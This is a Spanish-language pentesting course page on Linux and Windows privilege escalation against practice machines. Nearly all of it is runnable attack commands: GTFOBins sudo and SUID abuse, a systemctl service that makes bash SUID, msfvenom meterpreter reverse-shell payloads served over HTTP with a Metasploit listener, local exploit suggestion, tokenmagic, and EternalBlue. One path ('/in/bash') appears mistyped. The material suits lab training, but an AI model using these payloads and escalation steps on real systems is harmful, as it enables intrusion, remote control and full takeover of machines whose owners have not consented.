Escalada de Privilegios + Post Explotación

Escalada de Privilegios en Linux – Sudo -l

https://hackmyvm.eu/machines/machine.php?vm=Friendlyhackmyvm.eu

Subimos el payload a través del protocolo FTP. Nos ponemos en escucha mientras carga la página para la Reverse Shell. Hacemos tratamiento de la TTY.

LogoGTFOBins
sudo -l

Con el comando proporcionado en la página debemos de poner la ruta absoluta.

Escalada de Privilegios en Linux – Sudo -l | Parte 2

LogoTryHackMe | Brooklyn Nine NineTryHackMe
Logoless | GTFOBins
sudo -l 
sudo /usr/bin/less /etc/profile
!/bin/sh

Escalada de Privilegios en Linux – Binarios SUID

LogoTryHackMe | VulnversityTryHackMe

Otra técnica muy frecuente para escalar privilegios en Linux es la enumeración de binarios SUID, donde podremos conocer que binarios tienen setuid 0 y podemos utilizarlos para escalar privilegios en Linux.

find / -perm -4000 2>/dev/null

En el directorio /tmp, creamos un archivo en bash con este contenido.

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod u+s /in/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Ejecutamos.

bash archivo.sh

Hemos abusado de un binario. Ya somos root.

bash -p

Escalada de Privilegios en Linux – Binarios SUID | Parte 2

LogoVulNyxVulNyx
find / -perm -4000 2>/dev/null
Logoenv | GTFOBins
env /bin/sh -p

Escalada de Privilegios Automática con Metasploit en Linux & Windows

LogoWindows 7.ovaGoogle Docs
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP máquina atacante> LPORT=4444 -f exe -o virus.exe

Si no es de 64 bits.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP máquina atacante> LPORT=4444 -f exe -o virus.exe

Lo compartimos en un servidor en Python.

python3 -m http.server 80

Ponemos la IP en el buscador y nos descargamos el Python. Nos ponemos en escucha mediante Metasploit.

msfconsole
use multi/handler
show options
set LHOST <IP máquina atacante>
set PAYLOAD windows/meterpreter/reverse_tcp
run

Ejecutamos nuestro payload. Somos un usuario normal por lo que hay que escalar privilegios.

background 
search local_exploit_suggester
show options
sessions -l
set SESSION 1 
run

Nos salen los exploits operativos pero hay que probar uno a uno.

use windows/local/tokenmagic
show options
set SESSION 1
set LHOST <IP máquina atacante>
set LPORT 5555
run

Enumeración de Usuarios en Sistemas Windows

LogoFile on MEGA
msfconsole 
search eternalblue 
use 0
show options
set RHOSTS <IP máquina víctima>
run

En meterpreter.

shell
net users

El comando net users para poder ver los usuarios existentes dentro de un sistema Windows.

PreviousHacking Entornos CMSNextPivoting con Metasploit

Last updated